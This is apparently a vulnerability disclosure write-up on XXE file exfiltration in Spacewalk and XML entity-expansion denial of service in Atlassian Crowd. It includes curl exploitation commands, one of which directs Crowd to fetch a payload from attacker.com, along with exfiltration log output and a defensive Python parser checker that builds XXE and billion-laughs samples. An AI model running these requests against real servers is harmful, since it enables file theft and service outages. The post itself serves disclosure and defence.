A flaw was found in Spacewalk up to version 2.9 where it was vulnerable to XML internal entity attacks via the /rpc/api endpoint. An unauthenticated remote attacker could use this flaw to retrieve the content of certain files and trigger a denial of service, or in certain circumstances, execute arbitrary code on the Spacewalk server.
Local file read
XML-RPC call for final exploit
curl -X POST -sik https://victim.tld/rpc/api -H 'Content-Type: application/xml' --data @xxe-ftp-exfil.xml
After execution and running an FTP listener, you will see the remote DTD fetch, along with the following exfiltration of the local file.
"GET /external.dtd HTTP/1.1" 200 448 "-" "Java/1.8.0_151"
2020/02/17 00:00:00 [*] Connection Accepted from [x.x.x.x:00000]
PASS: [email protected]
2020/02/17 00:00:00 [*] Closing FTP Connection
Atlassian Crowd is a single sign-on and user identity solution for the web. Crowd ships with a built-in OpenID client for testing OpenID integrations. By pointing that test client at a URL hosting a malicious payload, an attacker can remotely DoS the Crowd instance: XML entity expansion consumes all available memory and the application subsequently crashes.
After studying the OpenID protocol and understanding what kind of XML is expected, I was able to craft the following response.
Proof of Concept XML XRDS payload:
Once hosted somewhere, invoking the following will execute the payload on the Crowd instance:
curl -sik 'https://crowd.victim.tld/openidclient/login!login.action' --data 'openid_identifier=https%3A%2F%2Fattacker.com%2Fxrds.php'
Now, the server will expand entities until memory is consumed and produce output such as:
Exception in thread "AsyncFileHandlerWriter-1300109446" java.lang.OutOfMemoryError: GC overhead limit exceeded
Exception in thread "http-nio-8095-exec-7" java.lang.OutOfMemoryError: GC overhead limit exceeded
Exception in thread "http-nio-8095-exec-8" Exception in thread "http-nio-8095-exec-6" java.lang.OutOfMemoryError: Java heap space
java.lang.OutOfMemoryError: Java heap space
Exception in thread "http-nio-8095-exec-4" java.lang.OutOfMemoryError: GC overhead limit exceeded
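Both issues above come down to what the XML parser is allowed to do: resolve external entities and DTDs (the Spacewalk remote DTD fetch and file exfiltration) and expand nested internal entities without bound (the Crowd memory exhaustion). The following is an added example, not code from the post or from either vendor, showing the parser-side checks a defender would enforce, written against Python's expat bindings; the sample documents are constructed, and the `file:///etc/hostname` target is just a placeholder.

```python
import xml.parsers.expat


class UnsafeXML(Exception):
    """Raised from a handler to abort parsing when the policy is violated."""


def check_xml(data: bytes, allow_internal_dtd: bool = False, max_text: int = 100_000) -> str:
    """Parse `data` under a restrictive policy; return 'ok' or a short rejection reason.

    Default policy rejects any DOCTYPE (the usual hardened setting, which kills both
    XXE and entity-expansion attacks). If an internal DTD is permitted, external
    subsets and external entities are still rejected, and parsing aborts once the
    expanded character data exceeds `max_text`, long before memory is exhausted.
    """
    parser = xml.parsers.expat.ParserCreate()
    seen = {"text": 0}

    def on_doctype(name, sysid, pubid, has_internal_subset):
        if not allow_internal_dtd:
            raise UnsafeXML("doctype-not-allowed")
        if sysid is not None or pubid is not None:   # external DTD would be fetched
            raise UnsafeXML("external-dtd")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        if sysid is not None or pubid is not None:   # SYSTEM/PUBLIC entity (XXE)
            raise UnsafeXML("external-entity:%s" % name)

    def on_text(text):
        seen["text"] += len(text)                    # counts expanded entity text too
        if seen["text"] > max_text:
            raise UnsafeXML("expansion-limit")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.CharacterDataHandler = on_text
    try:
        parser.Parse(data, True)
    except UnsafeXML as exc:
        return str(exc)
    except xml.parsers.expat.ExpatError as exc:
        return "malformed:%s" % exc
    return "ok"


# Constructed samples (not from the original post).
BENIGN = b"<methodCall><methodName>auth.login</methodName></methodCall>"
XXE = (b'<!DOCTYPE methodCall [<!ENTITY ext SYSTEM "file:///etc/hostname">]>'
       b"<methodCall><methodName>&ext;</methodName></methodCall>")


def billion_laughs(depth: int = 5, fanout: int = 10) -> bytes:
    """Build a classic entity-expansion document yielding 3 * fanout**depth characters."""
    decls = ['<!ENTITY lol "lol">']
    for i in range(1, depth + 1):
        ref = "&lol;" if i == 1 else "&lol%d;" % (i - 1)
        decls.append('<!ENTITY lol%d "%s">' % (i, ref * fanout))
    return ("<!DOCTYPE XRDS [%s]><XRDS>&lol%d;</XRDS>" % ("".join(decls), depth)).encode()
```

With the defaults every sample carrying a DOCTYPE is refused outright; enabling `allow_internal_dtd` shows the finer-grained rejections (external entity, expansion limit) that a parser must still enforce if DTDs are needed at all.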
Atlassian has responded to the issue via Bug Bounty program on Bugcrowd.com/atlassian and has issued fixes.
Software has been fixed as of:
CVE and CWE references:
Happy Hunting 😊